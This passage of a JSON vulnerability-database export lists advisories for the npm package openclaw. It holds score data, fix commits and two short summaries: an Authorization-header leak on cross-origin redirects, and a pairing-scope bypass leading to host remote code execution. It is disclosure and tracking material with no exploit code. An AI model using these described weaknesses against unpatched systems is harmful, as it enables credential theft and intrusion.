                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "CVE-2026-34426",
                "GHSA-h3x4-hc5v-v2gm"
            ],
            "risk_score": 3.4,
            "exploitability": "0.5",
            "weighted_severity": "6.8",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xyck-sspa-4ba2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89013?format=api",
            "vulnerability_id": "VCID-xz8s-hj5s-wfgj",
            "summary": "OpenClaw: Media download follows cross-origin redirects with Authorization headers intact\n## Summary\nMedia download follows cross-origin redirects with Authorization headers intact\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Shipped v2026.3.28 media downloads forwarded Authorization across cross-origin redirects, a real in-scope credential-leak class that fits medium.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `e704323ff388ed21f6963f9b8e0b1b8dfaaabc5f` — 2026-03-31T19:57:42+09:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/e704323ff388ed21f6963f9b8e0b1b8dfaaabc5f",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/e704323ff388ed21f6963f9b8e0b1b8dfaaabc5f"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-68v4-hmwv-f43h",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-68v4-hmwv-f43h"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-68v4-hmwv-f43h",
                    "reference_id": "GHSA-68v4-hmwv-f43h",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-68v4-hmwv-f43h"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "GHSA-68v4-hmwv-f43h"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xz8s-hj5s-wfgj"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89532?format=api",
            "vulnerability_id": "VCID-xzg5-ren5-p7gw",
            "summary": "OpenClaw: Device-Paired Node Skips Node Scope Gate → Host RCE\n## Summary\nDevice-Paired Node Skips Node Scope Gate → Host RCE\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: Real in shipped v2026.3.28, because a node that was merely device-paired could expose node commands without node pairing; a severity of high is sufficient given the pairing/setup prerequisites.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `3886b65ef21d02808c1a106fa1f9f69e22f71c32` — 2026-03-30T17:29:28+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41352",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00536",
                            "scoring_system": "epss",
                            "scoring_elements": "0.67865",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00536",
                            "scoring_system": "epss",
                            "scoring_elements": "0.67876",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00536",
                            "scoring_system": "epss",
                            "scoring_elements": "0.67869",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41352"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/3886b65ef21d02808c1a106fa1f9f69e22f71c32",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-24T16:36:03Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/3886b65ef21d02808c1a106fa1f9f69e22f71c32"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xj9w-5r6q-x6v4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-24T16:36:03Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xj9w-5r6q-x6v4"
                },
                {
